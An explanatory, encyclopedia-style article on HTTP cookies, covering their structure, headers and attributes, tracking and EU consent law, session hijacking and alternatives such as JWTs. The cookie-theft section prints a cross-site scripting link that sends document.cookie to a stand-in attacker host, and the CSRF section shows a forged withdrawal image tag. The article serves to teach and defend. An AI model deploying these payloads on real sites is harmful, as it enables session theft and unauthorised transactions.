A cookie consists of the following components:
Name
Value
Zero or more attributes (name/value pairs). Attributes store information such as the cookie's expiration, domain, and flags (such as Secure and HttpOnly).
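A minimal sketch of these components, using Python's standard http.cookies module and a hypothetical cookie, might look like this:

# Name, value and attributes of a parsed cookie.
from http.cookies import SimpleCookie

c = SimpleCookie()
c.load("sessionToken=abc123; Domain=example.org; Path=/; Secure; HttpOnly")

morsel = c["sessionToken"]
print(morsel.key)                          # name       -> sessionToken
print(morsel.value)                        # value      -> abc123
print(morsel["domain"], morsel["path"])    # attributes -> example.org /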
Uses
Session management
Cookies were originally introduced to provide a way for users to record items they want to purchase as they navigate throughout a website (a virtual "shopping cart" or "shopping basket"). Today, however, the contents of a user's shopping cart are usually stored in a database on the server, rather than in a cookie on the client. To keep track of which user is assigned to which shopping cart, the server sends a cookie to the client that contains a unique session identifier (typically, a long string of random letters and numbers). Because cookies are sent to the server with every request the client makes, that session identifier will be sent back to the server every time the user visits a new page on the website, which lets the server know which shopping cart to display to the user.
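The following is a simplified sketch of that mechanism, not any particular server's implementation: the cart lives in server-side storage (here just a Python dict) and the browser receives only a random session identifier.

# Server-side session handling sketch: the cookie carries only an identifier.
import secrets
from http.cookies import SimpleCookie

carts = {}   # session id -> list of items (a real server would use a database)

def start_session():
    """Create a new empty cart and return the Set-Cookie header for its id."""
    session_id = secrets.token_hex(16)          # long random identifier
    carts[session_id] = []
    cookie = SimpleCookie()
    cookie["sessionId"] = session_id
    cookie["sessionId"]["httponly"] = True
    return session_id, cookie.output()          # "Set-Cookie: sessionId=..."

session_id, header = start_session()
carts[session_id].append("book-9780132350884")  # item added on a later request
print(header)
print(carts[session_id])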
Another popular use of cookies is for logging into websites. When the user visits a website's login page, the web server typically sends the client a cookie containing a unique session identifier. When the user successfully logs in, the server remembers that that particular session identifier has been authenticated and grants the user access to its services.
Because session cookies only contain a unique session identifier, this makes the amount of personal information that a website can save about each user virtually limitless—the website is not limited to restrictions concerning how large a cookie can be. Session cookies also help to improve page load times, since the amount of information in a session cookie is small and requires little bandwidth.
Personalization
Cookies can be used to remember information about the user in order to show relevant content to that user over time. For example, a web server might send a cookie containing the username that was last used to log into a website, so that it may be filled in automatically the next time the user logs in.
Many websites use cookies for personalization based on the user's preferences. Users select their preferences by entering them in a web form and submitting the form to the server. The server encodes the preferences in a cookie and sends the cookie back to the browser. This way, every time the user accesses a page on the website, the server can personalize the page according to the user's preferences. For example, the Google search engine once used cookies to allow users (even non-registered ones) to decide how many search results per page they wanted to see.
Similarly, DuckDuckGo uses cookies to allow users to set viewing preferences, such as the colors of the web page.
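A hedged sketch of this pattern in Python (the preference fields and cookie name are hypothetical) encodes the submitted preferences into a single cookie value and decodes them on a later request:

# Storing user preferences in a cookie value.
import json
from urllib.parse import quote, unquote
from http.cookies import SimpleCookie

prefs = {"results_per_page": 50, "theme": "dark"}

cookie = SimpleCookie()
cookie["prefs"] = quote(json.dumps(prefs))       # percent-encode so the value stays cookie-safe
cookie["prefs"]["max-age"] = 365 * 24 * 3600     # remember for roughly a year
print(cookie.output())                           # Set-Cookie: prefs=...

# Later, after the browser returns the cookie, the server decodes it:
restored = json.loads(unquote(cookie["prefs"].value))
print(restored["results_per_page"], restored["theme"])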
Tracking
Tracking cookies are used to track users' web browsing habits. This can also be done to some extent by using the IP address of the computer requesting the page or the referer field of the HTTP request header, but cookies allow for greater precision. This can be demonstrated as follows:
If the user requests a page of the site, but the request contains no cookie, the server presumes that this is the first page visited by the user. So the server creates a unique identifier (typically a string of random letters and numbers) and sends it as a cookie back to the browser together with the requested page.
From this point on, the cookie will automatically be sent by the browser to the server every time a new page from the site is requested. The server not only sends the page as usual but also stores the URL of the requested page, the date/time of the request, and the cookie in a log file.
By analyzing this log file, it is then possible to find out which pages the user has visited, in what sequence, and for how long.
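As a rough illustration, the analysis step might look like the following Python sketch, where the log format (identifier, timestamp, URL per line) is a hypothetical simplification:

# Group logged requests by cookie identifier to reconstruct each visitor's path.
from collections import defaultdict

log_lines = [
    "u1a2b3 2024-05-01T10:00:00 /index.html",
    "u1a2b3 2024-05-01T10:01:30 /products.html",
    "z9y8x7 2024-05-01T10:02:10 /index.html",
    "u1a2b3 2024-05-01T10:05:45 /checkout.html",
]

visits = defaultdict(list)
for line in log_lines:
    identifier, timestamp, url = line.split()
    visits[identifier].append((timestamp, url))

for identifier, pages in visits.items():
    print(identifier, "->", [url for _, url in pages])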
Corporations exploit users' web habits by tracking cookies to collect information about buying habits. The Wall Street Journal found that America's top fifty websites installed an average of sixty-four pieces of tracking technology onto computers, resulting in a total of 3,180 tracking files. The data can then be collected and sold to bidding corporations.
Implementation
Cookies are arbitrary pieces of data, usually chosen and first sent by the web server, and stored on the client computer by the web browser. The browser then sends them back to the server with every request, introducing states (memory of previous events) into otherwise stateless HTTP transactions. Without cookies, each retrieval of a web page or component of a web page would be an isolated event, largely unrelated to all other page views made by the user on the website. Although cookies are usually set by the web server, they can also be set by the client using a scripting language such as JavaScript (unless the cookie's HttpOnly flag is set, in which case the cookie cannot be modified by scripting languages).
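On the client side, this store-and-resend behaviour can be sketched with Python's standard library (the URL is only an example; what is printed depends on what the server actually sets):

# A CookieJar stores cookies set by the server and attaches them to later requests.
import urllib.request
from http.cookiejar import CookieJar

jar = CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))

opener.open("https://www.example.org/")           # first request: the server may set cookies
for cookie in jar:
    print(cookie.name, "=", cookie.value)         # whatever the server stored

opener.open("https://www.example.org/spec.html")  # cookies in the jar are sent back automatically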
The cookie specifications require that browsers meet the following requirements in order to support cookies:
Can support cookies as large as 4,096 bytes in size.
Can support at least 50 cookies per domain (i.e. per website).
Can support at least 3,000 cookies in total.
Setting a cookie
Cookies are set using the Set-Cookie header field, sent in an HTTP response from the web server. This header field instructs the web browser to store the cookie and send it back in future requests to the server (the browser will ignore this header field if it does not support cookies or has disabled cookies).
As an example, the browser sends its first HTTP request for the homepage of the www.example.org website:
GET /index.html HTTP/1.1
Host: www.example.org
...
The server responds with two Set-Cookie header fields:
HTTP/1.0 200 OK
Content-type: text/html
Set-Cookie: theme=light
Set-Cookie: sessionToken=abc123; Expires=Wed, 09 Jun 2021 10:18:14 GMT
...
The server's HTTP response contains the contents of the website's homepage. But it also instructs the browser to set two cookies. The first, "theme", is considered to be a session cookie since it does not have an Expires or Max-Age attribute. Session cookies are intended to be deleted by the browser when the browser closes. The second, "sessionToken", is considered to be a persistent cookie since it contains an Expires attribute, which instructs the browser to delete the cookie at a specific date and time.
Next, the browser sends another request to visit the spec.html page on the website. This request contains a Cookie header field, which contains the two cookies that the server instructed the browser to set:
GET /spec.html HTTP/1.1
Host: www.example.org
Cookie: theme=light; sessionToken=abc123
…
This way, the server knows that this HTTP request is related to the previous one. The server would answer by sending the requested page, possibly including more Set-Cookie header fields in the HTTP response in order to instruct the browser to add new cookies, modify existing cookies, or remove existing cookies. To remove a cookie, the server must include a Set-Cookie header field with an expiration date in the past.
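For example, a server-side sketch of cookie removal using Python's http.cookies module (reusing the sessionToken name from the exchange above) might emit:

# Remove a cookie by re-sending it with an expiration date in the past.
from http.cookies import SimpleCookie

expired = SimpleCookie()
expired["sessionToken"] = "deleted"
expired["sessionToken"]["expires"] = "Thu, 01 Jan 1970 00:00:01 GMT"   # long in the past
expired["sessionToken"]["path"] = "/"   # must match the attributes used when it was set
print(expired.output())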
The value of a cookie may consist of any printable ASCII character (! through ~, Unicode \u0021 through \u007E) excluding commas, semicolons, and whitespace characters. The name of a cookie excludes the same characters, as well as =, since that is the delimiter between the name and value. The cookie standard RFC 2965 is more restrictive but is not implemented by browsers.
The term "cookie crumb" is sometimes used to refer to a cookie's name–value pair.
Cookies can also be set by scripting languages such as JavaScript that run within the browser. In JavaScript, the object document.cookie is used for this purpose. For example, the instruction document.cookie = "temperature=20" creates a cookie of name "temperature" and value "20".
Cookie attributes
In addition to a name and value, cookies can also have one or more attributes. Browsers do not include cookie attributes in requests to the server—they only send the cookie's name and value. Cookie attributes are used by browsers to determine when to delete a cookie, block a cookie or whether to send a cookie to the server.
Domain and Path
The Domain and Path attributes define the scope of the cookie. They essentially tell the browser what website the cookie belongs to. For security reasons, cookies can only be set on the current resource's top domain and its subdomains, and not for another domain and its subdomains. For example, the website example.org cannot set a cookie that has a domain of foo.com because this would allow the website example.org to control the cookies of the domain foo.com.
If a cookie's Domain and Path attributes are not specified by the server, they default to the domain and path of the resource that was requested. However, in most browsers there is a difference between a cookie set from foo.com without a domain, and a cookie set with the foo.com domain. In the former case, the cookie will only be sent for requests to foo.com, also known as a host-only cookie. In the latter case, all subdomains are also included (for example, docs.foo.com). Notable exceptions to this general rule are Edge prior to Windows 10 RS3 and Internet Explorer prior to IE 11 and Windows 10 RS4 (April 2018), which always send cookies to subdomains regardless of whether the cookie was set with or without a domain.
Below is an example of some Set-Cookie header fields in the HTTP response of a website after a user logged in. The HTTP request was sent to a webpage within the docs.foo.com subdomain:
HTTP/1.0 200 OK
Set-Cookie: LSID=DQAAAK…Eaem_vYg; Path=/accounts; Expires=Wed, 13 Jan 2021 22:23:01 GMT; Secure; HttpOnly
Set-Cookie: HSID=AYQEVn…DKrdst; Domain=.foo.com; Path=/; Expires=Wed, 13 Jan 2021 22:23:01 GMT; HttpOnly
Set-Cookie: SSID=Ap4P…GTEq; Domain=foo.com; Path=/; Expires=Wed, 13 Jan 2021 22:23:01 GMT; Secure; HttpOnly
…
The first cookie, LSID, has no Domain attribute, and has a Path attribute set to /accounts. This tells the browser to use the cookie only when requesting pages contained in docs.foo.com/accounts (the domain is derived from the request domain). The other two cookies, HSID and SSID, would be used when the browser requests any subdomain in .foo.com on any path (for example www.foo.com/bar). The prepending dot is optional in recent standards, but can be added for compatibility with RFC 2109 based implementations.
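A sketch of these scope attributes with Python's http.cookies module (placeholder values, cookie names taken from the example above) could read:

# Host-only cookie versus a cookie shared with all subdomains.
from http.cookies import SimpleCookie

c = SimpleCookie()
c["LSID"] = "placeholder"
c["LSID"]["path"] = "/accounts"          # host-only: no Domain attribute set

c["HSID"] = "placeholder"
c["HSID"]["domain"] = ".foo.com"         # sent to foo.com and all of its subdomains
c["HSID"]["path"] = "/"

print(c.output())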
Expires and Max-Age
The Expires attribute defines a specific date and time for when the browser should delete the cookie. The date and time are specified in the form Wdy, DD Mon YYYY HH:MM:SS GMT, or in the form Wdy, DD Mon YY HH:MM:SS GMT for values of YY where YY is greater than or equal to 0 and less than or equal to 69.
Alternatively, the Max-Age attribute can be used to set the cookie's expiration as an interval of seconds in the future, relative to the time the browser received the cookie. Below is an example of three Set-Cookie header fields that were received from a website after a user logged in:
HTTP/1.0 200 OK
Set-Cookie: lu=Rg3vHJZnehYLjVg7qi3bZjzg; Expires=Tue, 15 Jan 2013 21:47:38 GMT; Path=/; Domain=.example.com; HttpOnly
Set-Cookie: made_write_conn=1295214458; Path=/; Domain=.example.com
Set-Cookie: reg_fb_gate=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; Domain=.example.com; HttpOnly
The first cookie, lu, is set to expire sometime on 15 January 2013. It will be used by the client browser until that time. The second cookie, made_write_conn, does not have an expiration date, making it a session cookie. It will be deleted after the user closes their browser. The third cookie, reg_fb_gate, has its value changed to "deleted", with an expiration time in the past. The browser will delete this cookie right away because its expiration time is in the past. Note that the cookie will only be deleted if the domain and path attributes in the Set-Cookie field match the values used when the cookie was created.
Internet Explorer did not support Max-Age.
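As an illustrative sketch (placeholder cookie names and values), both expiry mechanisms can be generated with Python's standard library, using email.utils.formatdate to produce the required GMT date format:

# Absolute Expires date versus relative Max-Age interval.
import time
from email.utils import formatdate
from http.cookies import SimpleCookie

c = SimpleCookie()
c["lu"] = "placeholder"
c["lu"]["expires"] = formatdate(time.time() + 7 * 24 * 3600, usegmt=True)  # absolute date

c["made_write_conn"] = "placeholder"
c["made_write_conn"]["max-age"] = 7 * 24 * 3600   # the same week, expressed as an interval

print(c.output())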
Secure and HttpOnly
The Secure and HttpOnly attributes do not have associated values. Rather, the presence of just their attribute names indicates that their behaviors should be enabled.
The Secure attribute is meant to keep cookie communication limited to encrypted transmission, directing browsers to use cookies only via secure/encrypted connections. However, if a web server sets a cookie with a secure attribute from a non-secure connection, the cookie can still be intercepted when it is sent to the user by man-in-the-middle attacks. Therefore, for maximum security, cookies with the Secure attribute should only be set over a secure connection.
The HttpOnly attribute directs browsers not to expose cookies through channels other than HTTP (and HTTPS) requests. This means that the cookie cannot be accessed via client-side scripting languages (notably JavaScript), and therefore cannot be stolen easily via cross-site scripting (a pervasive attack technique).
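A brief sketch with Python's http.cookies module (hypothetical cookie) shows that enabling the flags simply appends the bare attribute names to the header:

# Flag attributes: setting them to True adds "Secure" and "HttpOnly" to the header.
from http.cookies import SimpleCookie

c = SimpleCookie()
c["sessionToken"] = "abc123"
c["sessionToken"]["secure"] = True      # only sent over encrypted (HTTPS) connections
c["sessionToken"]["httponly"] = True    # hidden from client-side scripts such as JavaScript

print(c.output())   # prints a Set-Cookie line containing both Secure and HttpOnly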
Browser settings
Most modern browsers support cookies and allow the user to disable them. The following are common options:
To enable or disable cookies completely, so that they are always accepted or always blocked.
To view and selectively delete cookies using a cookie manager.
To fully wipe all private data, including cookies.
Add-on tools for managing cookie permissions also exist.
Privacy and third-party cookies
Cookies have some important implications for the privacy and anonymity of web users. While cookies are sent only to the server setting them or a server in the same Internet domain, a web page may contain images or other components stored on servers in other domains. Cookies that are set during retrieval of these components are called third-party cookies. The older standards for cookies, RFC 2109 and RFC 2965, specify that browsers should protect user privacy and not allow sharing of cookies between servers by default. However, the newer standard, RFC 6265, explicitly allows user agents to implement whichever third-party cookie policy they wish. Most browsers, such as Mozilla Firefox, Internet Explorer, Opera, and Google Chrome, do allow third-party cookies by default, as long as the third-party website has a Compact Privacy Policy published. Newer versions of Safari block third-party cookies, and this is planned for Mozilla Firefox as well (initially planned for version 22 but postponed indefinitely).
Advertising companies use third-party cookies to track a user across multiple sites. In particular, an advertising company can track a user across all pages where it has placed advertising images or web bugs. Knowledge of the pages visited by a user allows the advertising company to target advertisements to the user's presumed preferences.
Website operators who do not disclose third-party cookie use to consumers run the risk of harming consumer trust if cookie use is discovered. Having clear disclosure (such as in a privacy policy) tends to eliminate any negative effects of such cookie discovery.
The possibility of building a profile of users is a privacy threat, especially when tracking is done across multiple domains using third-party cookies. For this reason, some countries have legislation about cookies.
The United States government set strict rules on setting cookies in 2000 after it was disclosed that the White House drug policy office had used cookies to track computer users viewing its online anti-drug advertising. In 2002, privacy activist Daniel Brandt found that the CIA had been leaving persistent cookies on computers that had visited its website. When notified that it was violating policy, the CIA stated that these cookies were not intentionally set and stopped setting them. On December 25, 2005, Brandt discovered that the National Security Agency (NSA) had been leaving two persistent cookies on visitors' computers due to a software upgrade. After being informed, the NSA immediately disabled the cookies.
EU cookie directive
In 2002, the European Union launched the Directive on Privacy and Electronic Communications (e-Privacy Directive), a policy requiring end users' consent for the placement of cookies, and similar technologies for storing and accessing information on users' equipment. In particular, Article 5 Paragraph 3 mandates that storing technically unnecessary data on a user's computer can only be done if the user is provided information about how this data is used, and the user is given the possibility of denying this storage operation. The Directive does not require users to authorise or be provided notice of cookie usage that are functionally required for delivering a service they have requested, for example to retain settings, store log-in sessions, or remember what is in a user's shopping basket.
In 2009, the law was amended by Directive 2009/136/EC, which included a change to Article 5, Paragraph 3. Instead of having an option for users to opt out of cookie storage, the revised Directive requires consent to be obtained for cookie storage. The definition of consent is cross-referenced to the definition in European data protection law, firstly the Data Protection Directive 1995 and subsequently the General Data Protection Regulation (GDPR). As the definition of consent was strengthened in the text of the GDPR, this had the effect of increasing the quality of consent required by those storing and accessing information such as cookies on users' devices. In a case decided under the Data Protection Directive, however, the Court of Justice of the European Union later confirmed that the previous law implied the same strong quality of consent as the current instrument. In addition to the requirement of consent which stems from storing or accessing information on a user's terminal device, the information in many cookies will be considered personal data under the GDPR alone, and will require a legal basis to process. This has been the case since the 1995 Data Protection Directive, which used an identical definition of personal data, although the GDPR in interpretative Recital 30 clarifies that cookie identifiers are included. While not all data processing under the GDPR requires consent, the characteristics of behavioural advertising mean that it is difficult or impossible to justify under any other ground.
Consent under the combination of the GDPR and e-Privacy Directive has to meet a number of conditions in relation to cookies. It must be freely given and unambiguous: preticked boxes were banned under both the Data Protection Directive 1995 and the GDPR (Recital 32). The GDPR is specific that consent must be as 'easy to withdraw as to give', meaning that a reject-all button must be as easy to access in terms of clicks and visibility as an 'accept all' button. It must be specific and informed, meaning that consent relates to particular purposes for the use of this data, and all organisations seeking to use this consent must be specifically named. The Court of Justice of the European Union has also ruled that consent must be 'efficient and timely', meaning that it must be gained before cookies are laid and data processing begins instead of afterwards.
The industry's response has been largely negative. Robert Bond of the law firm Speechly Bircham describes the effects as "far-reaching and incredibly onerous" for "all UK companies". Simon Davis of Privacy International argues that proper enforcement would "destroy the entire industry". However, scholars note that the onerous nature of cookie pop-ups stems from an attempt to continue to operate a business model through convoluted requests that may be incompatible with the GDPR.
Academic studies and regulators both describe wide-spread non-compliance with the law. A study scraping 10,000 UK websites found that only 11.8% of sites adhered to minimal legal requirements, with only 33.4% of websites studied providing a mechanism to reject cookies that was as easy to use as accepting them. A study of 17,000 websites found that 84% of sites breached this criterion, finding additionally that many laid third party cookies with no notice at all. The UK regulator, the Information Commissioner's Office, stated in 2019 that the industry's 'Transparency and Consent Framework' from the advertising technology group the Interactive Advertising Bureau was 'insufficient to ensure transparency and fair processing of the personal data in question and therefore also insufficient to provide for free and informed consent, with attendant implications for PECR [e-Privacy] compliance.' Many companies that sell compliance solutions (Consent Management Platforms) permit them to be configured in manifestly illegal ways, which scholars have noted creates questions around the appropriate allocation of liability.
A W3C specification called P3P was proposed for servers to communicate their privacy policy to browsers, allowing automatic, user-configurable handling. However, few websites implement the specification, no major browsers support it, and the W3C has discontinued work on the specification.
Third-party cookies can be blocked by most browsers to increase privacy and reduce tracking by advertising and tracking companies without negatively affecting the user's web experience on all sites. Some sites operate 'cookie walls', which make access to a site conditional on allowing cookies either technically in a browser, through pressing 'accept', or both. In 2020, the European Data Protection Board, composed of all EU data protection regulators, stated that cookie walls were illegal: "In order for consent to be freely given, access to services and functionalities must not be made conditional on the consent of a user to the storing of information, or gaining of access to information already stored, in the terminal equipment of a user (so called cookie walls)." Many advertising operators offer an opt-out from behavioural advertising, with a generic cookie in the browser stopping behavioural advertising. However, this is often ineffective against many forms of tracking, such as first-party tracking that is growing in popularity to avoid the impact of browsers blocking third-party cookies. Furthermore, if such a setting is more difficult to place than the acceptance of tracking, it remains in breach of the conditions of the e-Privacy Directive.
Cookie theft and session hijacking
Most websites use cookies as the only identifiers for user sessions, because other methods of identifying web users have limitations and vulnerabilities. If a website uses cookies as session identifiers, attackers can impersonate users' requests by stealing a full set of victims' cookies. From the web server's point of view, a request from an attacker then has the same authentication as the victim's requests; thus the request is performed on behalf of the victim's session.
Listed here are various scenarios of cookie theft and user session hijacking (even without stealing user cookies) that work with websites relying solely on HTTP cookies for user identification.
Network eavesdropping
Traffic on a network can be intercepted and read by computers on the network other than the sender and receiver (particularly over unencrypted open Wi-Fi). This traffic includes cookies sent on ordinary unencrypted HTTP sessions. Where network traffic is not encrypted, attackers can therefore read the communications of other users on the network, including HTTP cookies as well as the entire contents of the conversations, for the purpose of a man-in-the-middle attack.
An attacker could use intercepted cookies to impersonate a user and perform a malicious task, such as transferring money out of the victim's bank account.
This issue can be resolved by securing the communication between the user's computer and the server by employing Transport Layer Security (HTTPS protocol) to encrypt the connection. A server can specify the Secure flag while setting a cookie, which will cause the browser to send the cookie only over an encrypted channel, such as a TLS connection.
Publishing false sub-domain: DNS cache poisoning
If an attacker is able to cause a DNS server to cache a fabricated DNS entry (called DNS cache poisoning), then this could allow the attacker to gain access to a user's cookies. For example, an attacker could use DNS cache poisoning to create a fabricated DNS entry of f12345.www.example.com that points to the IP address of the attacker's server. The attacker can then post an image URL from his own server (for example, http://f12345.www.example.com/img_4_cookie.jpg). Victims reading the attacker's message would download this image from f12345.www.example.com. Since f12345.www.example.com is a sub-domain of www.example.com, victims' browsers would submit all example.com-related cookies to the attacker's server.
If an attacker is able to accomplish this, it is usually the fault of the Internet Service Providers for not properly securing their DNS servers. However, the severity of this attack can be lessened if the target website uses secure cookies. In this case, the attacker would have the extra challenge of obtaining the target website's TLS certificate from a certificate authority, since secure cookies can only be transmitted over an encrypted connection. Without a matching TLS certificate, victims' browsers would display a warning message about the attacker's invalid certificate, which would help deter users from visiting the attacker's fraudulent website and sending the attacker their cookies.
Cross-site scripting: cookie theft
Cookies can also be stolen using a technique called cross-site scripting. This occurs when an attacker takes advantage of a website that allows its users to post unfiltered HTML and JavaScript content. By posting malicious HTML and JavaScript code, the attacker can cause the victim's web browser to send the victim's cookies to a website the attacker controls.
As an example, an attacker may post a message on www.example.com with the following link:
<a href="#" onclick="window.location = 'http://attacker.com/stole.cgi?text=' + escape(document.cookie); return false;">Click here!</a>
When another user clicks on this link, the browser executes the piece of code within the onclick attribute, thus replacing the string document.cookie with the list of cookies that are accessible from the current page. As a result, this list of cookies is sent to the attacker.com server. If the attacker's malicious posting is on an HTTPS website https://www.example.com, secure cookies will also be sent to attacker.com in plain text.
It is the responsibility of the website developers to filter out such malicious code.
Such attacks can be mitigated by using HttpOnly cookies. These cookies will not be accessible by client-side scripting languages like JavaScript, and therefore, the attacker will not be able to gather these cookies.
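A minimal CGI-style sketch in C (the session identifier and path are placeholders, not taken from any real site) of how a server-side program could emit a cookie carrying both the Secure and HttpOnly attributes discussed above:

#include <stdio.h>

int main(void)
{
    /* A CGI program writes its HTTP response headers to standard output.
       "sid" is a placeholder; a real application would generate a
       cryptographically random session identifier. */
    printf("Content-Type: text/html\r\n");
    printf("Set-Cookie: sid=31d4d96e407aad42; Secure; HttpOnly; Path=/\r\n");
    printf("\r\n");
    printf("<html><body>Logged in.</body></html>\n");
    return 0;
}

With the Secure attribute the browser withholds the cookie from unencrypted requests, and with HttpOnly the cookie is not exposed through document.cookie, blocking the exfiltration shown in the cross-site scripting example above.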
Cross-site scripting: proxy request
In older versions of many browsers, there were security holes in the implementation of the XMLHttpRequest API. This API allows pages to specify a proxy server that would get the reply, and this proxy server is not subject to the same-origin policy. For example, a victim is reading an attacker's posting on www.example.com, and the attacker's script is executed in the victim's browser. The script generates a request to www.example.com with the proxy server attacker.com. Since the request is for www.example.com, all example.com cookies will be sent along with the request, but routed through the attacker's proxy server. Hence, the attacker would be able to harvest the victim's cookies.
This attack would not work with secure cookies, since they can only be transmitted over HTTPS connections, and the HTTPS protocol dictates end-to-end encryption (i.e. the information is encrypted on the user's browser and decrypted on the destination server). In this case, the proxy server would only see the raw, encrypted bytes of the HTTP request.
Cross-site request forgery
For example, Bob might be browsing a chat forum where another user, Mallory, has posted a message. Suppose that Mallory has crafted an HTML image element that references an action on Bob's bank's website (rather than an image file), e.g.,
<img src="http://bank.example.com/withdraw?account=bob&amount=1000000&for=mallory">
If Bob's bank keeps his authentication information in a cookie, and if the cookie hasn't expired, then the attempt by Bob's browser to load the image will submit the withdrawal form with his cookie, thus authorizing a transaction without Bob's approval.
Cookiejacking
Cookiejacking is an attack against Internet Explorer which allows the attacker to steal session cookies of a user by tricking a user into dragging an object across the screen. Microsoft deemed the flaw low-risk because of "the level of required user interaction", and the necessity of having a user already logged into the website whose cookie is stolen. Despite this, a researcher tried the attack on 150 of their Facebook friends and obtained cookies of 80 of them via social engineering.
Drawbacks of cookies
Besides privacy concerns, cookies also have some technical drawbacks. In particular, they do not always accurately identify users, they can be used for security attacks, and they are often at odds with the Representational State Transfer (REST) software architectural style.
Inaccurate identification
If more than one browser is used on a computer, each usually has a separate storage area for cookies. Hence, cookies do not identify a person, but a combination of a user account, a computer, and a web browser. Thus, anyone who uses multiple accounts, computers, or browsers has multiple sets of cookies.
Likewise, cookies do not differentiate between multiple users who share the same user account, computer, and browser.
Inconsistent state on client and server
The use of cookies may generate an inconsistency between the state of the client and the state as stored in the cookie. If the user acquires a cookie and then clicks the "Back" button of the browser, the state on the browser is generally not the same as before that acquisition. As an example, if the shopping cart of an online shop is built using cookies, the content of the cart may not change when the user goes back in the browser's history: if the user presses a button to add an item in the shopping cart and then clicks on the "Back" button, the item remains in the shopping cart. This might not be the intention of the user, who possibly wanted to undo the addition of the item. This can lead to unreliability, confusion, and bugs. Web developers should therefore be aware of this issue and implement measures to handle such situations.
Alternatives to cookies
Some of the operations that can be done using cookies can also be done using other mechanisms.
JSON Web Tokens
A JSON Web Token (JWT) is a self-contained packet of information that can be used to store user identity and authenticity information. This allows them to be used in place of session cookies. Unlike cookies, which are automatically attached to each HTTP request by the browser, JWTs must be explicitly attached to each HTTP request by the web application.
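Because the browser never attaches a JWT automatically, client code has to add it to each request itself, typically in an Authorization header. Below is a minimal sketch using libcurl in C; the URL and the token are placeholders, and a real application would obtain the token from a prior login response.

#include <stdio.h>
#include <curl/curl.h>

int main(void)
{
    const char *token = "eyJhbGciOiJIUzI1NiJ9.e30.placeholder";  /* placeholder JWT */
    char auth_header[512];
    snprintf(auth_header, sizeof(auth_header), "Authorization: Bearer %s", token);

    curl_global_init(CURL_GLOBAL_DEFAULT);
    CURL *curl = curl_easy_init();
    if (curl) {
        struct curl_slist *headers = curl_slist_append(NULL, auth_header);

        /* Unlike a cookie, the token is only sent because the code adds it here. */
        curl_easy_setopt(curl, CURLOPT_URL, "https://api.example.com/profile");
        curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headers);

        CURLcode res = curl_easy_perform(curl);
        if (res != CURLE_OK)
            fprintf(stderr, "request failed: %s\n", curl_easy_strerror(res));

        curl_slist_free_all(headers);
        curl_easy_cleanup(curl);
    }
    curl_global_cleanup();
    return 0;
}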
HTTP authentication
The HTTP protocol includes the basic access authentication and the digest access authentication protocols, which allow access to a web page only when the user has provided the correct username and password. If the server requires such credentials for granting access to a web page, the browser requests them from the user and, once obtained, the browser stores and sends them in every subsequent page request. This information can be used to track the user.
IP address
Some users may be tracked based on the IP address of the computer requesting the page. The server knows the IP address of the computer running the browser (or the proxy, if any is used) and could theoretically link a user's session to this IP address.
However, IP addresses are generally not a reliable way to track a session or identify a user. Many computers designed to be used by a single user, such as office PCs or home PCs, are behind a network address translator (NAT). This means that several PCs will share a public IP address. Furthermore, some systems, such as Tor, are designed to retain Internet anonymity, rendering tracking by IP address impractical, impossible, or a security risk.
URL (query string)
A more precise technique is based on embedding information into URLs. The query string part of the URL is the part that is typically used for this purpose, but other parts can be used as well. The Java Servlet and PHP session mechanisms both use this method if cookies are not enabled.
This method consists of the web server appending query strings containing a unique session identifier to all the links inside of a web page. When the user follows a link, the browser sends the query string to the server, allowing the server to identify the user and maintain state.
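As an illustration of this URL-rewriting scheme, the short C sketch below appends a hypothetical sessionid parameter to the links a page emits; the parameter name and identifier are invented for the example, and a real server would generate a random identifier per visitor.

#include <stdio.h>
#include <string.h>

/* Emit an HTML link with the session identifier appended to its URL. */
static void emit_link(const char *href, const char *session_id)
{
    /* Use '&' if the URL already carries a query string, '?' otherwise. */
    const char *sep = strchr(href, '?') ? "&" : "?";
    printf("<a href=\"%s%ssessionid=%s\">link</a>\n", href, sep, session_id);
}

int main(void)
{
    const char *sid = "ABC123";            /* normally generated per visitor */
    emit_link("/catalog/item42", sid);     /* -> /catalog/item42?sessionid=ABC123 */
    emit_link("/search?q=shoes", sid);     /* -> /search?q=shoes&sessionid=ABC123 */
    return 0;
}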
These kinds of query strings are very similar to cookies in that both contain arbitrary pieces of information chosen by the server and both are sent back to the server on every request. However, there are some differences. Since a query string is part of a URL, if that URL is later reused, the same attached piece of information will be sent to the server, which could lead to confusion. For example, if the preferences of a user are encoded in the query string of a URL and the user sends this URL to another user by e-mail, those preferences will be used for that other user as well.
Moreover, if the same user accesses the same page multiple times from different sources, there is no guarantee that the same query string will be used each time. For example, if a user visits a page by coming from a page internal to the site the first time, and then visits the same page by coming from an external search engine the second time, the query strings would likely be different. If cookies were used in this situation, the cookies would be the same.
Other drawbacks of query strings are related to security. Storing data that identifies a session in a query string enables session fixation attacks, referer logging attacks and other security exploits. Transferring session identifiers as HTTP cookies is more secure.
Hidden form fields
Another form of session tracking is to use web forms with hidden fields. This technique is very similar to using URL query strings to hold the information and has many of the same advantages and drawbacks. In fact, if the form is handled with the HTTP GET method, then this technique is similar to using URL query strings, since the GET method adds the form fields to the URL as a query string. But most forms are handled with HTTP POST, which causes the form information, including the hidden fields, to be sent in the HTTP request body, which is neither part of the URL, nor of a cookie.
This approach presents two advantages from the point of view of the tracker. First, having the tracking information placed in the HTTP request body rather than in the URL means it will not be noticed by the average user. Second, the session information is not copied when the user copies the URL (to bookmark the page or send it via email, for example).
"window.name" DOM property
All current web browsers can store a fairly large amount of data (2–32 MB) via JavaScript using the DOM property window.name. This data can be used instead of session cookies and is also cross-domain. The technique can be coupled with JSON/JavaScript objects to store complex sets of session variables on the client side.
The downside is that every separate window or tab will initially have an empty window.name property when opened. Furthermore, the property can be used for tracking visitors across different websites, making it of concern for Internet privacy.
In some respects, this can be more secure than cookies due to the fact that its contents are not automatically sent to the server on every request like cookies are, so it is not vulnerable to network cookie sniffing attacks. However, if special measures are not taken to protect the data, it is vulnerable to other attacks because the data is available across different websites opened in the same window or tab.
Identifier for advertisers
Apple uses a tracking technique called the "Identifier for Advertisers" (IDFA). This technique assigns a unique identifier to every user who buys an Apple iOS device (such as an iPhone or iPad). This identifier is then used by Apple's advertising network, iAd, to determine the ads that individuals are viewing and responding to.
ETag
Because ETags are cached by the browser, and returned with subsequent requests for the same resource, a tracking server can simply repeat any ETag received from the browser to ensure an assigned ETag persists indefinitely (in a similar way to persistent cookies). Additional caching header fields can also enhance the preservation of ETag data.
ETags can be flushed in some browsers by clearing the browser cache.
